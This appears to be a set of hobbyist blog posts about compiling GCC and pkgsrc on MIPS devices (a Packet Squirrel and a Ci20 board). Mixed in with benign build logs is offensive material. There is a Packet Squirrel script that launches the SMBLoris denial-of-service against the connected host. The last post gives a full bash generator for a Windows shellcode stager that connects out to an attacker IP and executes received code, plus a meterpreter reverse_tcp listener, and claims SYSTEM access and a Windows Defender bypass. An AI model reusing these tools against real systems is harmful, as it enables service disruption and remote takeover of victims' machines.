wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/binutils_2.24-3_ar71xx.ipk
wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/packages/gcc_4.8.3-1_ar71xx.ipk

Once the packages are downloaded upload them via scp to the Packet Squirrel to the /mnt partition

scp *.ipk root@172.16.32.1:/mnt/

Login to the Packet Squirrel via ssh

ssh root@172.16.32.1 
root@squirrel:~# mkdir /mnt/tt 
root@squirrel:~# mv /mnt/*.ipk /mnt/tt
root@squirrel:~#

And here is what I did with each ipk package separately on the /mnt/tt
The below is pretty self explanatory, since the ipk is a Gzipped Tarball really
containing other tarballs.

root@squirrel:/mnt/tt# mv libbfd_2.24-3_ar71xx.ipk libbfd_2.24-3_ar71xx.tar.gz
root@squirrel:/mnt/tt# rm -rf b2/
root@squirrel:/mnt/tt# gunzip libbfd_2.24-3_ar71xx.tar.gz 
root@squirrel:/mnt/tt# tar -xvf libbfd_2.24-3_ar71xx.tar 
./debian-binary
./data.tar.gz
./control.tar.gz

We are only interested in the data.tar.gz which contains the compiled binaries
and libraries, so we create a directory called libbfd and move the
data.tar.gz there for extraction

root@squirrel:/mnt/tt# rm debian-binary 
root@squirrel:/mnt/tt# rm control.tar.gz 
root@squirrel:/mnt/tt# rm libbfd_2.24-3_ar71xx.tar 
root@squirrel:/mnt/tt# mkdir libbfd
root@squirrel:/mnt/tt# mv data.tar.gz libbfd/
root@squirrel:/mnt/tt# cd libbfd/
root@squirrel:/mnt/tt/libbfd# ls
data.tar.gz
root@squirrel:/mnt/tt/libbfd# tar -zxvf data.tar.gz 
./
./usr/
./usr/lib/
./usr/lib/libbfd-2.24.so
./usr/lib/libbfd.s
root@squirrel:/mnt/tt/libbfd# ls -la
drwxr-xr-x 3 root root 4096 Jul 14 02:11 .
drwxr-xr-x 7 root root 4096 Jul 14 02:10 ..
-rw-r--r-- 1 107 111 393581 Jan 31 2016 data.tar.gz
drwxr-xr-x 3 root root 4096 Jul 14 02:11 usr
root@squirrel:/mnt/tt/libbfd# rm data.tar.gz 
root@squirrel:/mnt/tt/libbfd# cd usr/
root@squirrel:/mnt/tt/libbfd/usr# cd lib/
root@squirrel:/mnt/tt/libbfd/usr/lib# ls -al
drwxr-xr-x 2 root root 4096 Jul 14 02:11 .
drwxr-xr-x 3 root root 4096 Jul 14 02:11 ..
-rwxr-xr-x 1 root root 935260 Jan 31 2016 libbfd-2.24.so
lrwxrwxrwx 1 root root 14 Jul 14 02:11 libbfd.so -> libbfd-2.24.so

Next we need to create symlinks from the / root filesystem to the extracted binaries
and libraries on the /mnt USB Flash partition

root@squirrel:/mnt/tt/libbfd/usr/lib# pwd
/mnt/tt/libbfd/usr/lib
root@squirrel:/mnt/tt/libbfd/usr/lib# ln -s /mnt/tt/libbfd/usr/lib/libbfd-2.24.so /usr
/lib/libbfd-2.24.so
root@squirrel:/mnt/tt/libbfd/usr/lib# ln -s /mnt/tt/libbfd/usr/lib/libbfd-2.24.so /usr
/lib/libbfd.so

We repeat the same process for the following packages

binutils_2.24-3_ar71xx.ipk
objdump_2.24-3_ar71xx.ipk
libopcodes_2.24-3_ar71xx.ipk

Once we are done with these we can finally move on to the extraction of GCC ipk package

root@squirrel:/mnt/tt/gcc/usr# ls -al
drwxr-xr-x 5 root root 4096 Jul 14 02:06 .
drwxr-xr-x 3 root root 4096 Jul 14 02:39 ..
drwxr-xr-x 2 root root 4096 Jul 14 02:06 bin
drwxr-xr-x 3 root root 4096 Jul 14 02:06 include
drwxr-xr-x 3 root root 4096 Jul 14 02:06 lib

root@squirrel:/mnt/tt/gcc/usr/include# ls -al 
drwxr-xr-x 3 root root 4096 Jul 14 02:06 .
drwxr-xr-x 5 root root 4096 Jul 14 02:06 ..
drwxr-xr-x 3 root root 4096 Jul 14 02:06 c++

So we create a complete directory symlink to /mnt/tt/gcc/include
from /usr on the root filesystem of Packet Squirrel like so

root@squirrel:/mnt/tt/gcc/usr/include# ls -la include
lrwxrwxrwx 1 root root 25 Jul 14 02:11 include -> /mnt/tt/gcc/usr/include/

Next we do the same for the /mnt/tt/gcc/usr/lib/gcc directory

root@squirrel:/mnt/tt/gcc/usr/lib# ls -al
drwxr-xr-x 3 root root 4096 Jul 14 02:06 .
drwxr-xr-x 5 root root 4096 Jul 14 02:06 ..
drwxr-xr-x 3 root root 4096 Jul 14 02:06 gcc

root@squirrel:/usr/lib# ls -la gcc
lrwxrwxrwx 1 root root 25 Jul 14 02:11 gcc -> /disk/tt/gcc/usr/lib/gcc/

So by now you should have a fully working GCC compiler on the Packet Squirrel , you can try run/compile some code (SMBLoris.c for example) that you scp to the device

root@squirrel:/mnt/tt/gcc/usr/bin# ./gcc -v
Using built-in specs.
COLLECT_GCC=./gcc
COLLECT_LTO_WRAPPER=/mnt/tt/gcc/usr/bin/../lib/gcc/mips-openwrt-linux-uclibc/4.8.3/lto-wrapper
Target: mips-openwrt-linux-uclibc
Configured with: /home/buildbot/slave-local/ar71xx_generic/build/build_dir/target-mips_34kc_uClibc-0.9.33.2/gcc-4.8.3/configure --target=mips-openwrt-linux --host=mips-openwrt-linux --build=x86_64-linux-gnu --program-prefix= --program-suffix= --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin --libexecdir=/usr/lib --sysconfdir=/etc --datadir=/usr/share --localstatedir=/var --mandir=/usr/man --infodir=/usr/info --disable-nls --build=x86_64-linux-gnu --host=mips-openwrt-linux-uclibc --target=mips-openwrt-linux-uclibc --enable-languages=c,c++ --with-bugurl=https://dev.openwrt.org/ --with-pkgversion='OpenWrt GCC 4.8.3' --enable-shared --disable-__cxa_atexit --enable-target-optspace --with-gnu-ld --disable-nls --disable-libmudflap --disable-multilib --disable-libgomp --disable-libquadmath --disable-libssp --disable-decimal-float --disable-libstdcxx-pch --with-host-libstdcxx=-lstdc++ --prefix=/usr --libexecdir=/usr/lib --with-float=soft
Thread model: posix
gcc version 4.8.3 (OpenWrt GCC 4.8.3)

root@squirrel:/mnt/tt/gcc/usr/bin#./gcc /mnt/smbloris.c -o /mnt/smbloris

The smbloris.c is taken from Hector Marcan’s github here https://gist.github.com/marcan/6a2d14b0e3eaa5de1795a763fb58641e#file-smbloris-c

The following Packet Squirrel code can be used to launch SMBLoris attack from this device onto the local network on which it is connected, set it to switch 1/2/3

# Show SETUP LED 
LED SETUP 
# Set the network mode to NAT 
NETMODE NAT 
sleep 5

# You may want to increase your local conntrack limit
echo 1200000 > /proc/sys/net/netfilter/nf_conntrack_max

# Get the IP address for the connected target machine 
ip="$(cat /var/dhcp.leases | awk '{print $3}')"

# Execute smbloris against the target IP 
/mnt/smbloris eth0 1.1.1.1 255.255.255.254 $ip &

I have tested this against the latest Windows 10 64bit  version 10.0.16299.19 on a physical hardware, the CPU gets to 100 %, memory jumps high as you can see on the video below

Im sure there might be some other tools that can be used in a similar manner (Exploit code written in C for example and compiled on the Packet Squirrel.. the possibilities are endless)

Nevertheless this was a fun exercise

Ci20 is a great little board that I got recently since I wanted to experiment with a new architecture (mips)  Quick specifications are here :

More detailed information is here https://elinux.org/CI20_Hardware  and here https://elinux.org/MIPS_Creator_CI20

The  board comes with Debian Linux mips  7.5  preinstalled and a custom kernel

Linux mipsbox 3.0.8-00847-g2e5af7d #1 SMP PREEMPT Wed Jun 24 10:10:52 BST 2015 mips GNU/Linux

There are possibilities to flash the NAND storage with newer images available from here https://elinux.org/CI20_Distros but I wanted to keep the stock kernel because of the custom drivers for the GPU that support mplayer hw-playback.

Before getting to work with the PKGSRC on Linux I wanted to build natively a newer GCC compiler (stock comes with GCC 4.6.3) So I have decided to give the 7.2.0 a try and build it natively.

Please note that I have used the –program-suffix=-4.6  and /usr/include/c++/4.6 in the configure – this is not correct but a dirty hack to overwrite the current GCC 4.6 files in Debian (it is a nightmare to remove the GCC related stuff as it has many dependencies)  It works quite well :)

Download GCC to the Ci20 
# wget https://ftp.gnu.org/gnu/gcc/gcc-7.2.0/gcc-7.2.0.tar.gz
# tar -zxvf gcc-7.2.0.tar.gz
# ./configure -v --enable-languages=c,c++,objc,obj-c++ --prefix=/usr
 --program-suffix=-4.6 --enable-shared --enable-linker-build-id 
 --with-system-zlib --libexecdir=/usr/lib --without-included-gettext
 --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6
 --libdir=/usr/lib --enable-nls --with-sysroot=/ 
 --enable-clocale=gnu --enable-libstdcxx-debug
 --enable-libstdcxx-time=yes --enable-gnu-unique-object 
 --enable-plugin --with-mips-plt --with-arch-32=mips2 
 --with-tune-32=mips32 --enable-targets=all --with-arch-64=mips3
 --with-tune-64=mips64 --enable-checking=release 
 --build=mipsel-linux-gnu --host=mipsel-linux-gnu
 --target=mipsel-linux-gnu

It took approx 30 hours to build on my Ci20, be patient (also maybe
a good idea is to create some swap just in case you would run out of
memory, I did mine on a USB drive) 

# mount /dev/sda1 /mnt/usb
# dd if=/dev/zero of=/mnt/usb/swapfile bs=1M count=102
# chmod 600 /mnt/usb/swapfile 
# mkswap /mnt/usb/swapfile
# swapon /mnt/usb/swapfile 

Finally build GCC 

# make
# make install

Once we have the GCC 7.2 installed it will be in the old GCC 4.6 directory structure, but it does not matter

root@mipsbox:/usr/include/c++/4.6# gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/mipsel-linux-gnu/7.2.0/lto-wrapper
Target: mipsel-linux-gnu
Configured with: ./configure -v --enable-languages=c,c++,objc,obj-c++ --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --with-mips-plt --with-arch-32=mips2 --with-tune-32=mips32 --enable-targets=all --with-arch-64=mips3 --with-tune-64=mips64 --enable-checking=release --build=mipsel-linux-gnu --host=mipsel-linux-gnu --target=mipsel-linux-gnu
Thread model: posix
gcc version 7.2.0 (GCC)

Now lets go and bootstrap pkgsrc on the Ci20 ! I have decided to keep the pkgsrc sources on a separate USB flash drive and the /usr/pkg on the NAND flash.

root@mipsbox:/disk# ftp ftp.netbsd.org
Connected to ftp.netbsd.org.
220 ftp.NetBSD.org FTP server (NetBSD-ftpd 20110904) ready.
Name (ftp.netbsd.org:root): ftp
331 Guest login ok, type your name as password.
Password:

230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pas
Passive mode on.
ftp> cd pub
250 CWD command successful.
ftp> cd pkgsrc
250-
 Please read the file README
 it was last modified on Tue Nov 18 09:53:20 2008 - 3299 days ago
250 CWD command successful.
ftp> cd pkgsrc-2017Q3
250 CWD command successful.
ftp> get pkgsrc.tar.gz

Once it is downloaded, extract it on the USB drive and set symlinks

# pwd 
/mnt/usb
# tar -zxvf pkgsrc.tar.gz
# ln -s /mnt/usb/pkgsrc /usr/pkgsrc

and move onto the bootstrapping, also read the following https://wiki.netbsd.org/pkgsrc/how_to_use_pkgsrc_on_linux/

# echo "export SH=/bin/bash" >> /root/.bashrc

Relogin to root again and continue the bootstrap. The current bootstrap script does not understand the endianess of MIPS platforms, thus fails to produce correct arch type as mipseb or mipsel (Ci20 is mipsel)

I have produced a patch bootstrap that works for the Ci20

*** patched-bootstrap 2017-12-03 22:06:12.960991623 +0100
--- bootstrap 2017-10-23 03:00:23.000000000 +0200
***************
*** 1,6 ****
 #! /bin/sh
 
! # $NetBSD: bootstrap,v 1.243.4.1 2017/10/31 15:53:48 spz Exp $
 #
 # Copyright (c) 2001-2011 Alistair Crooks <agc@NetBSD.org>
 # All rights reserved.
--- 1,6 ----
 #! /bin/sh
 
! # $NetBSD: bootstrap,v 1.244 2017/10/22 19:29:20 bsiegert Exp $
 #
 # Copyright (c) 2001-2011 Alistair Crooks <agc@NetBSD.org>
 # All rights reserved.
***************
*** 691,697 ****
 need_awk=yes
 need_sed=yes
 set_opsys=yes
! machine_arch=mipsel
 check_compiler=yes
 if [ `uname -r` -lt 6 ]; then
 # IRIX 5's mkdir bails out with an error when trying to create with the -p
--- 691,697 ----
 need_awk=yes
 need_sed=yes
 set_opsys=yes
! machine_arch=mipseb
 check_compiler=yes
 if [ `uname -r` -lt 6 ]; then
 # IRIX 5's mkdir bails out with an error when trying to create with the -p
***************
*** 720,727 ****
 case "$machine_arch" in
 i?86) machine_arch=i386 ;;
 ppc64le) machine_arch=powerpc64le ;;
! mips) machine_arch=mipsel 
! esac
 ;;
 Minix)
 root_group=operator
--- 720,726 ----
 case "$machine_arch" in
 i?86) machine_arch=i386 ;;
 ppc64le) machine_arch=powerpc64le ;;
! esac
 ;;
 Minix)
 root_group=operator
***************
*** 869,875 ****
 # "i386" can support 64-bit, e.g. SunOS, defaults to 32-bit.
 i386/64) abi=64 machine_arch=x86_64 ;;
 i386/*) abi=32 machine_arch=i386 ;;
- mips/*) abi=32 machine_arch=mipsel ;;
 # XXX: powerpc untested
 powerpc/64) abi=64 machine_arch=powerpc64 ;;
 powerpc/*) abi=32 machine_arch=powerpc ;;
--- 868,873 ----

After you patch the /usr/pkgsrc/bootstrap/bootstrap, you can run it and after 1 hour the pkgsrc will get bootstrapped successfully on the Ci20 Debian mipsel

# cd /usr/pkgsrc/bootstrap
# ./bootstrap

To bmake packages afterwards make sure you have the following directories in path/usr/pkg/bin and /usr/pkg/sbin

What I found however were these minor issues during bmake build afterwards

/usr/pkgsrc/deve/readline

root@mipsbox:/usr/pkgsrc/devel/readline# /usr/pkg/bin/bmake 
=> Bootstrap dependency digest>=20010302: found digest-20160304
===> Skipping vulnerability checks.
WARNING: No /usr/pkg/pkgdb/pkg-vulnerabilities file found.
WARNING: To fix run: `/usr/pkg/sbin/pkg_admin -K /usr/pkg/pkgdb fetch-pkg-vulnerabilities'.
=> Checksum SHA1 OK for readline-7.0.tar.gz
=> Checksum RMD160 OK for readline-7.0.tar.gz
=> Checksum SHA512 OK for readline-7.0.tar.gz
===> Installing dependencies for readline-7.0
=> Tool dependency libtool-base>=2.4.2nb9: found libtool-base-2.4.6
=> Tool dependency nbpatch-[0-9]*: found nbpatch-20151107
=> Build dependency cwrappers>=20150314: found cwrappers-20170611
===> Overriding tools for readline-7.0
===> Extracting for readline-7.0
===> Patching for readline-7.0
=> Applying pkgsrc patches for readline-7.0
===> Creating toolchain wrappers for readline-7.0
===> Configuring for readline-7.0
=> Modifying GNU configure scripts to avoid --recheck
=> Replacing config-guess with pkgsrc versions
=> Replacing config-sub with pkgsrc versions
=> Replacing install-sh with pkgsrc version
checking build system type... mipsel-debian-linux-gnu
checking host system type... mipsel-debian-linux-gnu

Beginning configuration for readline-7.0 for mipsel-debian-linux-gnu

checking whether make sets $(MAKE)... yes
checking for mipsel-debian-linux-gcc... /usr/bin/gcc
checking whether the C compiler works... no
configure: error: in `/disk/pkgsrc/devel/readline/work/readline-7.0':
configure: error: C compiler cannot create executables
See `config.log' for more details
*** Error code 77

Stop.
bmake[1]: stopped in /usr/pkgsrc/devel/readline
*** Error code 1

Stop.
bmake: stopped in /usr/pkgsrc/devel/readline

The problem is during the following configure test (lets check the cofig.log)

root@mipsbox:/usr/pkgsrc/devel/readline# less /disk/pkgsrc/devel/readline/work/readline-7.0/config.log

This file contains any messages produced by compilers while
running configure, to aid debugging if configure makes a mistake.

It was created by readline configure 7.0, which was
generated by GNU Autoconf 2.69. Invocation command line was

$ ./configure --prefix=/usr/pkg --build=mipsel-debian-linux --host=mipsel-debian-linux --infodir=/usr/pkg/info --mandir=/usr/pkg/man
<--snip-->
gcc version 7.2.0 (GCC) 
configure:2792: $? = 0
configure:2781: /usr/bin/gcc -V >&5
gcc: error: unrecognized command line option '-V'
gcc: fatal error: no input files
compilation terminated.
configure:2792: $? = 1
configure:2781: /usr/bin/gcc -qversion >&5
gcc: error: unrecognized command line option '-qversion'; did you mean '--version'?
gcc: fatal error: no input files
compilation terminated.
configure:2792: $? = 1
configure:2812: checking whether the C compiler works
configure:2834: /usr/bin/gcc -O2 -D_FORTIFY_SOURCE=2 -Wl,-R/usr/pkg/lib conftest.c >&5
as: Invalid transform rule: l:termcap:
configure:2838: $? = 1
configure:2876: result: no
configure: failed program was:
| /* confdefs.h */
| #define PACKAGE_NAME "readline"
| #define PACKAGE_TARNAME "readline"
| #define PACKAGE_VERSION "7.0"
| #define PACKAGE_STRING "readline 7.0"
| #define PACKAGE_BUGREPORT "bug-readline@gnu.org"
| #define PACKAGE_URL ""
| /* end confdefs.h. */
| 
| int
| main ()
| {
| 
| ;
| return 0;
| }
configure:2881: error: in `/disk/pkgsrc/devel/readline/work/readline-7.0':
configure:2883: error: C compiler cannot create executables
See `config.log' for more details

What worked however was going to the work dir of readline and doing the following

root@mipsbox:# cd /usr/pkgsrc/devel/readline/work/readline-7.0
root@mipsbox:# ./configure --prefix=/usr/pkg 
root@mipsbox:# echo "readline-7.0" > /usr/pkgsrc/devel/readline/work/.configure_done
root@mipsbox:# cd /usr/pkgsrc/devel/readline/work/readline-7.0/
root@mipsbox:# /usr/pkg/bin/bmake 
root@mipsbox:# echo "readline-7.0" > /usr/pkgsrc/devel/readline/work/.build_done
root@mipsbox:# mkdir -p work/.destdir/usr/pkg/info
root@mipsbox:# touch work/.destdir/usr/pkg/info/history.info
root@mipsbox:# touch work/.destdir/usr/pkg/info/readline.info
root@mipsbox:# touch work/.destdir/usr/pkg/info/rluserman.info
root@mipsbox:# touch work/.destdir/usr/pkg/lib/libhistory.la
root@mipsbox:# touch work/.destdir/usr/pkg/lib/libreadline.la
root@mipsbox:# mkdir -p work/.destdir/usr/pkg/man/man3
root@mipsbox:# touch work/.destdir/usr/pkg/man/man3/readline.3
root@mipsbox:# cd /usr/pkgsrc/devel/readline
root@mipsbox:# /usr/pkg/bin/bmake install 

Same approach as above worked for /usr/pkgsrc/lang/python27

root@mipsbox:/usr/pkg/bin# ./python2.7
Python 2.7.14 (default, Dec 3 2017, 18:36:28) 
[GCC 7.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>

Here is the list of packages that I have made so far

drwxr-xr-x 2 root root 728 Dec 3 20:00 bigreqsproto-1.1.2
drwxr-xr-x 2 root root 728 Dec 2 15:07 bmake-20150505
drwxr-xr-x 2 root root 800 Dec 2 15:07 bootstrap-mk-files-20170802
drwxr-xr-x 2 root root 800 Dec 3 22:07 bzip2-1.0.6nb1
drwxr-xr-x 2 root root 656 Dec 2 15:01 cwrappers-20170611
drwxr-xr-x 2 root root 728 Dec 3 19:56 damageproto-1.2.1
drwxr-xr-x 2 root root 800 Dec 3 22:07 db4-4.8.30
drwxr-xr-x 2 root root 728 Dec 2 15:31 digest-20160304
drwxr-xr-x 2 root root 944 Dec 3 21:32 docbook-xml-4.5
drwxr-xr-x 2 root root 872 Dec 3 21:32 docbook-xsl-1.79.1nb2
drwxr-xr-x 2 root root 728 Dec 3 19:48 dri2proto-2.8
drwxr-xr-x 2 root root 728 Dec 3 19:50 dri3proto-1.0
drwxr-xr-x 2 root root 728 Dec 3 19:55 fixesproto-5.0
drwxr-xr-x 2 root root 728 Dec 3 19:52 glproto-1.4.17
drwxr-xr-x 2 root root 728 Dec 3 19:54 inputproto-2.3.2
drwxr-xr-x 2 root root 728 Dec 2 15:35 kbproto-1.0.7
drwxr-xr-x 2 root root 1016 Dec 3 22:07 libffi-3.2.1nb4
drwxr-xr-x 2 root root 944 Dec 3 21:35 libgpg-error-1.27
drwxr-xr-x 2 root root 728 Dec 2 15:32 libtool-base-2.4.6
drwxr-xr-x 2 root root 728 Dec 3 20:05 libXau-1.0.8
drwxr-xr-x 2 root root 728 Dec 3 20:07 libXdmcp-1.1.2
drwxr-xr-x 2 root root 728 Dec 3 19:47 libxml2-2.9.6
drwxr-xr-x 2 root root 872 Dec 3 22:07 mozilla-rootcerts-1.0.20170121nb6
drwxr-xr-x 2 root root 728 Dec 2 15:08 nawk-20121220nb1
drwxr-xr-x 2 root root 728 Dec 2 15:32 nbpatch-20151107
drwxr-xr-x 2 root root 728 Dec 3 11:02 pax-20080110nb2
drwxr-xr-x 2 root root 944 Dec 3 21:32 perl-5.26.0nb3
drwxr-xr-x 2 root root 728 Dec 2 15:35 pkgconf-1.3.5
-rw-r--r-- 1 root root 2170880 Dec 3 22:07 pkgdb.byfile.db
drwxr-xr-x 2 root root 944 Dec 2 15:30 pkg_install-20170419
drwxr-xr-x 2 root root 728 Dec 3 19:51 presentproto-1.1
drwxr-xr-x 2 root root 656 Dec 3 09:25 pth-2.0.7nb5
drwxr-xr-x 2 root root 656 Dec 3 22:07 python27-2.7.14
drwxr-xr-x 2 root root 728 Dec 3 19:58 randrproto-1.5.0
drwxr-xr-x 2 root root 800 Dec 3 10:45 readline-7.0
drwxr-xr-x 2 root root 728 Dec 2 15:35 renderproto-0.11.1
drwxr-xr-x 2 root root 728 Dec 3 19:59 tradcpp-0.5.2nb2
drwxr-xr-x 2 root root 728 Dec 3 21:29 unzip-6.0nb8
drwxr-xr-x 2 root root 728 Dec 3 19:47 xcb-proto-1.12
drwxr-xr-x 2 root root 728 Dec 3 20:01 xcmiscproto-1.2.2
drwxr-xr-x 2 root root 728 Dec 3 19:53 xextproto-7.3.0
drwxr-xr-x 2 root root 728 Dec 3 20:02 xf86bigfontproto-1.2.0
drwxr-xr-x 2 root root 728 Dec 3 19:57 xf86driproto-2.1.1nb1
drwxr-xr-x 2 root root 728 Dec 3 19:56 xf86vidmodeproto-2.3.1
drwxr-xr-x 2 root root 1144 Dec 3 19:47 xmlcatmgr-2.2nb1
drwxr-xr-x 2 root root 728 Dec 2 15:35 xproto-7.0.31
drwxr-xr-x 2 root root 728 Dec 3 20:03 xtrans-1.3.5
drwxr-xr-x 2 root root 800 Dec 3 19:47 xz-5.2.3nb1

Feel free to use the pkgsrc binaries I have built for the mipsel CI20 Creator board

https://45.76.81.249:8000/pkgsrc/

I have used GCC 7.2.0 on the stock Linux mipsbox 3.0.8-00847-g2e5af7d #1 SMP PREEMPT Wed Jun 24 10:10:52 BST 2015 mips GNU/Linux

Only thing I have added is the new symlink to libstdcc++.so.6.0.24 from the GCC build to /usr/lib/mipsel-linux-gnu because of GLIBCXX_3.4.21 requirement in libstdcc++.so.6 during Node.JS build

Will keep the repo updated as I progress hopefully further.

The stock Debian Linux 7.5  does not have new Ruby in the repos for the mipsel architecture, so I have decided to use Ruby24 from pkgsrc (check the previous two articles)   I have created a small repo of all binary packages I have managed to build via pkgsrc here :

https://45.76.81.249:8000/pkgsrc/debian-ci20/All/

So once I got the ruby24 up and running I have setup the environment for Metasploit Framework

- Make sure you set symlinks to pkgsrc ruby 
root@mipsbox:/usr/bin# 
 0 lrwxrwxrwx 1 root root 19 Dec 10 20:03 ruby -> /usr/pkg/bin/ruby24
 0 lrwxrwxrwx 1 root root 18 Dec 10 20:03 gem -> /usr/pkg/bin/gem24
 0 lrwxrwxrwx 1 root root 19 Dec 10 20:14 bundle -> /usr/pkg/bin/bundle
 0 lrwxrwxrwx 1 root root 20 Dec 10 20:14 bundler -> /usr/pkg/bin/bundler

- Proceed on setting up Metasploit-Framework 

root@mipsbox:~/# git clone https://github.com/rapid7/metasploit-framework
root@mipsbox:~/# cd metasploit-framework 
root@mipsbox:~/metasploit-framework# apt-get install libpcap0.8-dev
root@mipsbox:~/metasploit-framework# apt-get install libsqlite3-dev
root@mipsbox:~/metasploit-framework# gem install backports
root@mipsbox:~/metasploit-framework# gem install os 
root@mipsbox:~/metasploit-framework# git config --global user.name "user"
root@mipsbox:~/metasploit-framework# git config --global user.email "user@email.com"
root@mipsbox:~/metasploit-framework# bundle install
root@mipsbox:~/metasploit-framework#./msfupdate

Now once we have a Metasploit running on the Ci20 (takes approx 3-4 minutes to load) we should put it under some test to see if it works off the mipsel architecture.

So I have used the following scenario for the test ->

• Generate a payload.exe on the Ci20 mipsel device via a custom generator script
• Move the payload.exe to another machine that will host it via Samba, run strip on x86 architecture to get rid of all symbols from payload.exe – this cannot be done on the mispel arch.
• Execute the listener on the Ci20 mipsel device
• Execute the payload.exe on Windows 10 (Nov 2017 cumulative updates)

So for the Ci20 in order to cross-compile Win PE32/64 binaries we need mingw and that could be installed via apt

root@mipsbox:~/metasploit-framework# apt-get install gcc-mingw-w64-i686 gcc-mingw-w64-x86-64

The Generator and the Listener used in these tests are here:

Generator :

#!/bin/bash
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo "****************************************************************" 
echo -en 'Metasploit server IP : ' 
read ip
echo -en 'Metasploit port number : ' 
read port

echo '#include <stdio.h>'> temp.c 
echo '#include <stdlib.h>' >> temp.c 
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c 
echo -n 'unsigned char server[]="' >> temp.c 
echo -n $ip >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo -n 'unsigned char serverp[]="' >> temp.c 
echo -n $port >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo 'void winsock_init() {' >> temp.c 
echo ' WSADATA wsaData;' >> temp.c 
echo ' WORD wVersionRequested;' >> temp.c 
echo ' wVersionRequested = MAKEWORD(2, 2);'>> temp.c 
echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c 
echo ' printf("bad\n"); '>> temp.c 
echo ' WSACleanup(); '>> temp.c 
echo ' exit(1);'>> temp.c 
echo ' }' >> temp.c 
echo ' }' >> temp.c 
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c 
echo ' printf("r %s\n", error);'>> temp.c 
echo ' closesocket(my_socket);'>> temp.c 
echo ' WSACleanup();'>> temp.c 
echo ' exit(1);' >> temp.c 
echo ' }' >> temp.c 
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c 
echo ' int tret = 0;'>> temp.c 
echo ' int nret = 0;'>>temp.c 
echo ' void * startb = buffer;'>> temp.c 
echo ' while (tret < len) {'>>temp.c 
echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c 
echo ' startb += nret;'>> temp.c 
echo ' tret += nret;'>>temp.c 
echo ' if (nret == SOCKET_ERROR)'>> temp.c 
echo ' punt(my_socket, "no data");'>> temp.c 
echo ' }'>>temp.c 
echo ' return tret;'>> temp.c 
echo '}' >> temp.c 
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c 
echo ' struct hostent * target;' >> temp.c 
echo ' struct sockaddr_in sock;' >> temp.c
echo ' SOCKET my_socket;'>>temp.c 
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c 
echo ' if (my_socket == INVALID_SOCKET)'>> temp.c 
echo ' punt(my_socket, ".");'>>temp.c 
echo ' target = gethostbyname(targetip);'>>temp.c 
echo ' if (target == NULL)'>>temp.c 
echo ' punt(my_socket, "..");'>>temp.c 
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c 
echo ' sock.sin_family = AF_INET;'>> temp.c 
echo ' sock.sin_port = htons(port);'>>temp.c 
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c 
echo ' punt(my_socket, "...");'>>temp.c 
echo ' return my_socket;'>>temp.c 
echo '}' >> temp.c 
echo 'int main(int argc, char * argv[]) {' >> temp.c 
echo ' FreeConsole();'>>temp.c 
echo ' Sleep(10);'>>temp.c 
echo ' ULONG32 size;'>>temp.c 
echo ' char * buffer;'>>temp.c 
echo ' void (*function)();'>>temp.c 
echo ' winsock_init();'>> temp.c 
echo ' SOCKET my_socket = wsconnect(server, atoi(serverp));'>>temp.c 
echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c 
echo ' if (count != 4 || size <= 0)'>>temp.c 
echo ' punt(my_socket, "error lenght\n");'>>temp.c 
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c 
echo ' if (buffer == NULL)'>>temp.c 
echo ' punt(my_socket, "error in buf\n");'>>temp.c 
echo ' buffer[0] = 0xBF;'>>temp.c 
echo ' memcpy(buffer + 1, &my_socket, 4);'>>temp.c 
echo ' count = recv_all(my_socket, buffer + 5, size);'>>temp.c 
echo ' function = (void (*)())buffer;'>>temp.c 
echo ' function();'>>temp.c 
echo ' return 0;'>>temp.c 
echo '}' >> temp.c 
echo '(+) Compiling binary ..' 
i686-w64-mingw32-gcc temp.c -o payload.exe -lws2_32 -mwindows 
ls -la temp.c
file=`ls -la payload.exe` ; echo '(+)' $file

Listener

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp ; set LHOST ' > run.listener.sh 
echo -n $host >> run.listener.sh 
echo -n '; set LPORT ' >> run.listener.sh 
echo -n $port >> run.listener.sh 
echo -n '; run"' >> run.listener.sh 
chmod +x run.listener.sh 
./run.listener.sh

The result was good, a reverse shell was acquired, session was elevated to NT AUTHORITY/SYSTEM and inbuilt Windows Defender bypassed.

Video attached

As of today there are 256 pkgsrc packages available for the Creator Ci-20 stock Debian 7.5 image available here : https://45.76.81.249:8000/pkgsrc/debian-ci20/All/

